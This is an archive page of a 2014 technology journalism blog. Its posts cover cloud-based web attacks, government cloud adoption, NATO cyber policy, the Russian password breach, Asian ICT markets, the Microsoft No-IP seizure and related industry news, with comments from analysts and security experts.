AWS an increasingly important tool for web app attackers

Posted: October 9, 2014 | Author: | Filed under: Uncategorized | Tags: , , , , , , , , | Leave a comment

amazon web services logoIt should come as no surprise that the web application layer is one of the most vulnerable and highly targeted in any IT organisation. The latest report from Imperva I’ve just covered for Infosecurity Magazine, bears that out, and adds some interesting new insights.

Did you know, for example, that public cloud platforms like Amazon Web Services are increasingly being used by cyber criminals to launch such attacks?

According to Imperva, 20% of all known vulnerability exploitation attempts aimed at its customers came from AMS servers – that’s a pretty sizeable chunk.

Director of security research at the Israeli firm, Itsik Mantin, told me part of the reason:

“The ability of the attackers to utilize cloud services to mount their attack, makes it easier for them to carry out longer campaigns, and thus they can scan for more vulnerabilities in more pages in the target application,” he said.

Another point of note from the report is the continued growth in SQL injection attacks – up 10% since the last report – and the less well known Remote File Inclusion (RFI) attacks, which have increased 24%.

So what’s to blame? Well not necessarily bad coding, according to Mantin.

“Applications have become more complicated, with more pages and more functions, relying on more third-party modules that are hard to control, and thus the size of the attack ‘domain’ grows over time,” he explained.

Mantin also pointed out that the attack incidents analysed in the report included attacks that were detected and prevented.

“Thus the numbers in the research indicate more the attacker’s intention and less the vulnerability of the applications,” he said.

It’s finally time for governments to get all cloudy eyed.

Posted: September 24, 2014 | Author: | Filed under: Uncategorized | Tags: , , , , , , , , , | Leave a comment

cloudI’ve just finished a piece for a client charting the progress of cloud computing projects in the public sector around the world and I’ve got to say, it makes pretty miserable reading for the UK.

Despite the launch, to great fanfare, of the G-Cloud project a couple of years ago, awareness among public servants seems pretty low still and sales not exactly setting the world alight – G-Cloud vendors brought in £217m in July, rising to just under £250m the month after.

That said, we’re a small country, and things are looking up. The technology is mature enough and use cases are starting to spring up all over the place, which will speed adoption. However, long term outsourcing contracts are still impeding the development of cloud projects, according to Nigel Beighton, international VP of technology at Rackspace – a G-Cloud vendor.

“The public sector’s move to the cloud is still in its infancy, and I applaud what Liam Maxwell and the whole G-Cloud team are trying to do. But it will take time,” he told me via email.

“Over the past few years the cloud has matured and grown, and is now able to do just about everything you need it to do. For public sector agencies that are yet to make the move to the cloud, one of the main benefits is that it offers great flexibility and that they won’t be locked into one provider. There are also many parts of the sector that are hit with large peaks in their service at certain times of the year, and they could really benefit from a pay as you go, or utility, cloud-model.”

Over in China there is no such reticence, mainly because many public sector bodies have no existing legacy contracts/infrastructure to encumber them. I remember EMC’s Greater China boss saying as much a couple of years ago in Hong Kong and it’s still true, according to Frost & Sullivan’s Danni Xu.

She said the central government threw RMB 1.5bn (£150m) at public sector cloud development in the five major Chinese cities in 2011. Then local governments – many with more money than some countries – followed suit: witness Guangzhou Sky Cloud Project, Chongqing Cloud Project, Harbin Cloud Valley Project and Xian Twin Cloud Strategic Cloud Town Project. An ecosystem similar to that which has grown up in the UK, US and elsewhere, has developed around this new investment, she told me.

“The formation of a more complete cloud ecosystem has benefited local enterprises and local government in many ways. With plenty of cloud offerings available in the market, the public sector itself has also emerged as an important spender for cloud services, among the various vertical sectors,” Xu said.

“For instance, the Ningxia municipal government works with AWS on building a large-scale data center in the region. Meanwhile, it will also leverage Amazon’s platform to deliver e-government services in the future.”

Forrester analyst Charlie Dai counselled that most public sector projects in China are still private cloud based, at least when it comes to SoEs.

“The government is also trying to strengthen the control and regulate the market,” he added.

“The China Academy of Telecommunications Research of the Ministry of Industry and Information Technology (MIIT) launched official authorisation on trusted cloud services (TRUCS) for public cloud early this year.”

Quelle Surprise.

What is obvious, in China as in the UK and elsewhere, however, is that we’re only at the beginning of a very long journey. Whether it takes 10 or 50 years, the cloud is ultimately where governments around the world will look to in order to work more productively and deliver public services more efficiently.

Is NATO about to make cyber war a reality?

Posted: September 3, 2014 | Author: | Filed under: Uncategorized | Tags: , , , , , , , , , , , , , | Leave a comment

nato meetingThis week I’ve been looking at the news that NATO’s set to ratify a new cyber policy which first made public back in June. So far, so boring you might think.

Well, actually this one is pretty significant in that it seeks to extend Article 5 – the collective defence clause that if someone strikes at one NATO member they strike at them all – to the cyber world.

In doing so NATO is going further than individual governments in trying to establish international principles that a cyber attack can be considered the same as a traditional military strike.

However, the chances of the alliance actually invoking Article 5 are pretty slim – as KPMG cyber security partner Stephen Bonner told me it has only happened once before, after 9/11.

“The reality is that few cyber attacks are likely to be of sufficient scale and impact to justify invoking Article 5 – and they would not happen in isolation from a broader deterioration in international security. In other words, if there was a state attack then it would have a broader context,” he added.

“This announcement is primarily a rhetorical point which is possibly aimed at having a deterrent effect.”

That said, I think it’s still an important step.

Some might argue that the lack of clarity around what would be considered an act of cyber war kind of diminishes its value, but as McAfee director of cybersecurity, Jarno Limnéll, told me, this is the right thing to do tactically.

“I think this is wise policy, spelling out a clear threshold would encourage adversaries to calibrate their attacks to inflict just enough damage to avoid retaliation,” he argued.

Elsewhere, consultancy BAE Systems Applied Intelligence also welcomed the news.

“Cyber criminals do not respect national boundaries so protecting national interests will require increasing international cooperation,” a spokesperson told me by email.

“It is therefore encouraging to see the increasing priority which cyber is being given in NATO’s agenda. This complements multiple other initiatives nationally and internationally to address a growing security risk and help secure the systems we are increasingly reliant on.”

The new policy will not just concentrate on collective defence clause, of course, and BAE also welcomed the increasing focus on intelligence sharing between member countries and with the private sector.

Whatever the efficacy of NATO’s move, it once again underscores the increasing importance being attached to cyber channels by politicians and military leaders.

As Limnéll said, these are necessary steps given the relative immaturity of the industry.

“We have to remember that we are just living the dawn of the cyber warfare era and the ‘cyber warfare playbook’ is pretty empty,” he told me.

“Most of the destructive cyber tools being developed haven’t been actively deployed. Capabilities to do real damage via cyber attacks are a reality but fortunately there has not been the will to use these yet. However, that is one option, as a continuation of politics, for countries nowadays.”

Hong Kong’s online TV shambles

Posted: August 15, 2014 | Author: | Filed under: Uncategorized | Tags: , , , , , , , , , | Leave a comment

hong kong skylineI’ve just finished a feature slightly out of my comfort zone – Hong Kong’s online TV market, or lack thereof.

The Chinese SAR has a huge appetite for net TV – you just have to get onto an MTR, visit a dim sum restaurant or try and get past a local ambling on the pavement whilst staring at their phablet, to realise that.

The former colony also has an ideal set-up – 4G is commonplace; the locals are pretty tech-savvy early adopter types relative to the rest of Asia; and broadband penetration is amongst the highest in the world.

Yet thus far it still doesn’t have its own online TV service. Hongkongers have to get their content from mainland China or further afield to satisfy their lust for internet telly.

Local entrepreneur Ricky Wong tried his best with HKTV but hit a brick wall in the form of a government shamelessly protecting the vested interests of the region’s incumbent broadcasters.

It’s a shame because this model of broadcasting, whilst probably never fully replacing traditional modes, will definitely come to play a major part in our content consuming lives over the next decade.

Gartner’s Terick Chiu explained to me that it’s not just the online TV players and content producers who stand to benefit.

“In their efforts to drive engagement with consumers, both incumbents and new entrants are likely to invest in the technology of second-screen applications. These applications are built on top of automatic content recognition (ACR) technologies, which enable an application to detect content metadata — usually contained in a digital watermark — and synchronise the application with the on-screen programming,” he said.

“For service providers and advertisers, these second-screen apps will become an important element of the future of TV, given their ability to provide an ongoing stream of information about consumer preferences and interests. These apps also enable a form of e-commerce or ‘embedded merchandising’, which links a viewer to products/services that are featured in video programming”.

IDC’s Greg Ireland, meanwhile, argued that internet TV would “usher in a new wave of competition” in the broadcast industry – which should spell good news for viewers.

“One item to watch is how these services, or other new services, emerge as ‘true’ competitors to traditional pay TV,” he told me. “That is, will any begin to license linear content and offer a pay TV service of live and on-demand content entirely over the internet?”

It’s going to happen sooner or later in Hong Kong, as around the world, so the government might as well get out of the way and let it happen now.

Russian mega-hack: time to get serious about alternatives to passwords?

Posted: August 8, 2014 | Author: | Filed under: Uncategorized | Tags: , , , , , , , , , | Leave a comment

padlockAll the talk this week has been of the Russian mega-hack. A data breach revealed first in the New York Times by a security firm called Hold Security of an estimated 1.2 billion username and password combinations and 500 million email addresses.

So what can we say about it?

Well, according to the security experts I spoke to we can summarise as follows:

  • It won’t be enough to push website owners into adopting more secure authentication mechanisms like two-factor authentication; passwords are just too user friendly and the alternatives would be too expensive.
  • The best we can hope for is it will encourage people to use password managers, or at least stop sharing passwords across sites, and improve the strength of those passwords.
  • It’s still not clear if this was as big a breach as claimed. We don’t know whether the details are current passwords, where they were obtained and exactly how. Fixating on the size is also missing the point a bit, as there are huge breaches every year.
  • Online firms should see this as a wake-up call. Patch those SQL flaws and keep passwords more secure – by doing this you’ll remove the “lower hanging fruit” these Russian attackers clearly went for.

Beyond that, Thales UK head of cyber security, Peter Armstrong told me he was disheartened to see Hold Security already trying to monetise its findings by charging for breach notification services.

“Once of the key building blocks that underpins the improvement in the global cyber defence posture is the preparedness of organisations to share threat intelligence. The creed and ethos here is we are only strong if we are strong together,” he added.

“Threat Information Exchange must remain a philosophy of openness and community benefit not individual benefit. This organisation [Hold Security] has derived benefit historically from this free information exchange helping them to amass the capability and intelligence to make this discovery in the first place. This kind of behaviour is likely to trigger black listing of organisations for bad behaviours from a community perspective and under those circumstances it is only the cyber criminals who benefit.”

For KPMG cyber security director, Tom Burton, the main issue here is whether passwords are still fit for purpose. He thinks not.

“The pervasive nature of the internet means mere mortals cannot possibly remember a different password for each and every website they have registered with, let alone passwords with strength,” he told me by email.

“In the short term, individuals must take a more risk based approach, maintaining strong and unique credentials for those sites that would create the greatest impact if breached (bank accounts and email accounts are two such examples) while being pragmatic and using common passwords for sites that really would be little more than an irritation if breached.”

For CISOs it comes down to risk management, and in many cases fortifying the organisation against such breaches may come higher on the agenda than dealing with advanced targeted attacks, he argued.

“It is too easy with modern processing to crack a large file of password hashes, and there will always be vulnerabilities that enable criminals to gain access to those hash files,” concluded Burton.

“If there is one thing that I feel is certain it is that this is unlikely to be the last announced breach of this kind, and is probably not going to be the largest.  If it doesn’t prompt businesses and individuals to rethink how they are protecting themselves then the criminals will have a bright future ahead of them.”

Malaysia: another contender for Asia’s ICT crown?

Posted: August 5, 2014 | Author: | Filed under: Uncategorized | Tags: , , , , , , , , , , , | Leave a comment

malaysia flagIDG Connect has just published another of my forays into Asia’s ICT markets, this time focusing on Malaysia and whether it can possibly sneak in to take the crown of regional digital hub from its rivals in Hong Kong, Singapore and elsewhere.

The truth is that the country has flown under the radar for much of the past 20-odd years, although in reality the government had been pushing for foreign investment there since the early 1970s, when Intel and six other firms set up facilities in what was once nothing more than mud and rice fields.

Fast forward to today and Malaysia has something of an image problem, according to Ng Wan Peng, COO of Malaysia’s Multimedia Development Corporation (MDeC), the government agency leading the charge.

“While the country is fast-becoming viewed as a top Asian holiday destination, with beautiful beaches and luxury hotels, it doesn’t immediately spring to mind as a place for foreign firms to invest or in which to establish their Asian hub,” she told me.

Its efforts to change this and help the country move up the ICT value chain were spearheaded by the founding of the Multimedia Super Corridor (MSC) – a hi-tech investment zone running from Kuala Lumpur airport into the city centre. It’s designed to spur foreign investment (33% of which comes from the UK) and encourage that transformation into a “digital economy” by 2020.

The Malaysian government has put together a very generous set of inducements to invest here, including a “Bill of Guarantees” which promises MSC-status companies: a 10-year income tax “holiday” or investment tax allowance for up to 5 years; freedom of ownership; strong cybersecurity laws; and no internet censorship, according to Peng. The government also offers unrestricted employment of foreign knowledge workers, cutting visa-related red-tape.

So what else? This is what Peng had to say:

The answers range from the economical, to the cultural, to the financial. For one, we are politically and socially stable. We also believe our multi-cultural society holds a business advantage – we Malaysians are used to sitting across the table from someone of a different ethnicity to us from an early age, so we’re used to conducting business with people from all geographies and walks of life. Being a largely English-speaking population is also attractive to Western investors, while our world-class infrastructure helps to facilitate global commerce without fear of being disrupted by natural disasters.

So far so good. But there are challenges, as Frost & Sulivan APAC associated director Pranabesh Nath explained to me.

“Areas that stand out as challenges include inadequate technology infrastructure, lack of sufficient talent, small domestic market, and not enough ‘knowledge jobs’,” he argued. “Adoption of technology for consumers in terms of usage, and lower e-commerce penetration provides additional growth challenges. The government, though, recognises these shortcomings and is expect to be implementing policy to overcome them.”

Indeed, Peng explained separately without prompting that these areas of concern are being addressed by the government.

There’s certainly a will from the top to make this work which is heartening to see and some impressive growth stats already. Yet I wonder whether the problem Malaysia might face is in that delicate balance between encouraging foreign investment via tax breaks and other inducements and nurturing its home-grown companies.

“There are frameworks and policies since the ’90s on encouraging home grown companies, however these don’t seem to have worked very well,” Nath argued. “Technology and markets have also changed rapidly in the last 20 years and it is always hard to keep up to date with the latest development and growth areas.”

However, he was optimistic of a way to surmount this problem and accelerate Malaysia’s ICT growth without this coming at the expense of home-grown companies.

“The internet of things and its applications in industry sectors such as automobiles, healthcare and consumer are enabling new business models and use-cases such as wearable technology. These highly integrated solutions use all key tech areas such as cloud, big-data and high speed connectivity,” he explained.

“A strong emphasis being a leader in this area, coupled with a focus on generating a knowledge intensive economy can propel Malaysian ICT to much greater growth in the next five years. Both foreign investment and local companies’ incubation can be simultaneously pursued in these cases. Now we just need strong policies that can implement the above.”

 

Keeping an eye on the coders: a new idea to eliminate flawed programs

Posted: July 21, 2014 | Author: | Filed under: Uncategorized | Tags: , , , , , , , , , , , , , , , | Leave a comment

codeHere’s an interesting new idea from Microsoft – a radical solution to the problem of buggy code.

The new paper, posed by Redmondian Andrew Begel and a group of Zurich university boffins, suggests managers monitor programmers via EEG, EDA and eye-tracking sensors. These will alert them when the individual is struggling and therefore likely to introduce flawed code.

Now, it sounds like a pretty good idea in theory, and in practice has apparently performed pretty well. But one security expert I spoke to had some major misgivings.

Imperva co-founder and CTO Amichai Shulman argued that it might stray outside the boundaries of what could be construed “reasonable”.

“I think constantly monitoring the psychological status and the physical conditions of programmers, seems tremendously intrusive and probably strays way off from what I consider to be ‘reasonable means’,” he told me.

“However, I think that even if we review this in the cold eyes of a software professional there are some doubts about the usefulness of this method in general and its application to security vulnerabilities in particular.”

The first doubt he had relates to the tremendous commercial pressure coders are under to release “more functionality in less time”.

“On their way to achieving higher rates of LOC/sec, programmers as well as their employers are willing to sacrifice other attributes of the code such as efficiency, readability and also correctness – assuming that some of these will be corrected later during testing cycles and some will not be critical enough to be ever fixed,” he explained.

“If we introduce a system that constantly holds back on programmers because they are stressed for some reason we will effectively introduce unbearable delays into the project which will of course put more pressure on those who perform the job when schedule becomes tight.”

This is not to mention the fact that programmers should, at times, be “over” challenged to keep them sharp and happy with their roles.

“Additionally, there’s a big question of whether we can have a system like that can make a distinction between making a critical mistake or a minor one, which again impacts its ability to have a positive effect on the software development process in general,” said Shulman.

Then, of course, there’s the issue of what kinds of flaws the system will root out.

“I think that most security related mistakes are introduced inadvertently as a consequence of the programmer not having the faintest idea regarding the potential implication of some implementation decision,” he argued. “This is the case with SQL injection, XSS, RFI and many more vulnerability types.”

So, bottom line: nice idea Microsoft, but it’s probably not going to solve the problem of poor coding anytime soon. Until something genuinely revolutionary comes along we’ll probably have to stick to the usual suspects to reduce risk: security tools, patching, better QA and testing.

No-IP? No idea. Why Microsoft faces an uphill battle to restore trust

Posted: July 4, 2014 | Author: | Filed under: Uncategorized | Tags: , , , , , , , , , , , , | Leave a comment

big dataTo say this week was a bad news week for Microsoft would be putting it mildly.

First, its heavy handed decision to stop emailing security updates to users (in response to new Canadian anti-spam laws) was u-turned in a rather embarrassing manner.

Then came something much worse as Redmond’s Digital Crimes Unit (DCU) unilaterally sought a court injunction to seize control of 22 domains belonging to DNS firm No-IP.

It did this to arrest the spread of malicious activity on some of the domains, but with good reason commentators are already calling its strategy misjudged this time around:

  • No-IP was not informed of the take-down, nor was it working in collusion with the cyber criminals. It also pleaded that it has always co-operated with the authorities when asked on such matters previously.
  • Microsoft was unable to filter good traffic from bad, leading to millions of legitimate No-IP customers left without a service earlier this week.

Europol special advisor on internet security, Brian Honan, told me that the incident will further undermine the credibility of tech giants like Microsoft, which has already taking a pasting thanks to the NSA spying revelations from whistleblower Edward Snowden.

He raised a number of valid concerns with me by email:

• If No-IP were not contacted by Microsoft DCU regarding the abuse of their services what right have Microsoft DCU got to determine how good or bad the No-IP abuse mechanisms were? Indeed, what is the criteria and standards that Microsoft used to determine how responsive the No-IP abuse desk is? Are all service providers, including Microsoft, now expected to meet the requirements and expectations of Microsoft DCU? And if not can they expect similar interruptions to their business?
• Microsoft DCU also showed they do not have the technical capabilities in managing Dynamic DNS services and subsequently have impacted many innocent users and businesses, how will Microsoft DCU ensure
• There are also concerns over Microsoft infringing on the privacy of No-Ip’s legitimate customers.  In effect Microsoft diverted all of these customers’ internet traffic via Microsoft’s systems. An action that could place No-Ip and Microsoft in breach of their own privacy policies and indeed various privacy laws and regulations.

This is probably the first major mis-step by the Digital Crimes Unit, and it will need to re-examine its procedures and processes very carefully to avoid a repeat. Its loss of face in this incident will only benefit the cybercriminals if it makes Redmond and others more hesitant to take action in future cases.

News of the World hackers, hacked ATMs and celeb snooping

Posted: July 3, 2014 | Author: | Filed under: Uncategorized | Tags: , , , , , , , | Leave a comment

news of the worldNews of the World private investigator Glenn Mulcaire was this week revealed to have gone to extraordinary lengths to hide his illegal tapping of celebrities’ voicemails: hacking an ATM to use its phone line.

I covered the story here for Infosecurity Magazine but thought it was worth including some extra comments.

Mulcaire’s cover was finally blow when BT sent a bill for the landline to the ATM owner, who forwarded it to the convenience store in which it was located, in a scruffy part of south London.

Sophos senior security advisor, Paul Ducklin, explained to me that Mulcaire probably chose an ATM line rather than tapping a copper phone line via other means, for several reasons.

“1. Unlike a fax machine the line never plays through a speaker for feedback purposes. Fax machines usually play their modem noises for a few seconds as part of the ‘user interface’.

2. If you interrupt a data transmission, the system will probably sort itself out automatically later on and no-one will realise that it was deliberate, rather than just a glitch. And you’ll hear the modem trying to come on-line, so you can hang up temporarily to get out of the way.

3. It’s likely to be a rented service that bundles in the phone line, so the bills probably go through a convoluted route to the person where the line is actually installed, making detection more complex – as happened here.”

He stressed the important of business owners checking their phone statements, just as one should bank statements or those belonging to online accounts, for any signs of suspicious activity.

“Cybercriminality usually leaves traces, and the one thing you can be sure of if you don’t make a habit of looking for those traces is that you won’t find them,” Ducklin told me.

“In various recent high-profile credit card breach cases, the afflicted retailer found out because someone outside the organisation noticed suspicious patterns of fraud. Best not to wait until someone else finds out before you do.”

Is Taiwan’s last chance at tech survival the connected home?

Posted: June 25, 2014 | Author: | Filed under: Uncategorized | Tags: , , , , , , , , , , , , | Leave a comment

taiwanI’ve just finished another piece for IDG Connect taking apart the Taiwanese technology industry – it seemed like as good a time as any on the back of Computex 2014.

If you haven’t heard of the show it’s the second largest IT event in the world and is held every year in Taipei as it has been for 34 years.

Well, the island formerly known as Formosa has been punching well above its weight on the tech scene for decades now, thanks to lots of government investment, a booming chip industry and a steady stream of bright young engineers and designers pouring from its universities.

But as I found out, many of its major firms are facing an unprecedented set of challenges which could threaten its long term future.

Firstly the PC market is in decline – which is bad news for 4th and 5th placed global brands Acer and Asus. Whether terminal decline we still don’t know but it has certainly meant Taiwan’s major ODM/OEM firms have had to adapt to a new mobile-centric output.

The two big brands mentioned above, however, haven’t done a very convincing job so far.

“The whole shift to mobility including smartphones and tablets is the new growth curve for the whole industry,” Forrester analyst Bryan Wang told me from Computex. “What I have seen is that Taiwanese companies are losing in this space.”

Gartner’s Amy Teng was not much more optimistic.

“These manufacturers have to rely on brand vendors to consume their production outcome. This business relationship is weak because today’s PC supply chain is advanced and standardised enough to transplant from vendor to vendor easily,” she argued.

Teng added that the move from high volume, low customisation products to low volume, highly customised products is a big challenge – especially when these manufacturers are being asked to be more cost effective and quicker to market.

All is not lost, though. The country’s semiconductor firms are still well placed and there are opportunities in other areas for those ODM/OEM giants like Wistron, Foxconn, Quanta and Pegatron.

“Regarding how to overcome, or thrive in the coming decade, I do not see any opportunity in the smartphone/tablet space now. However, Taiwanese companies still stand a chance in the connected home space, which is set to evolve in the next couple of years,” said Wang.

“Home/smart gateways, set-top-boxes and smart routers – these could be the angles. At Computex here, I do see home grid, smart plugs, smart home solutions are evolving as an interesting area.”

← Older Entries
Newer Entries →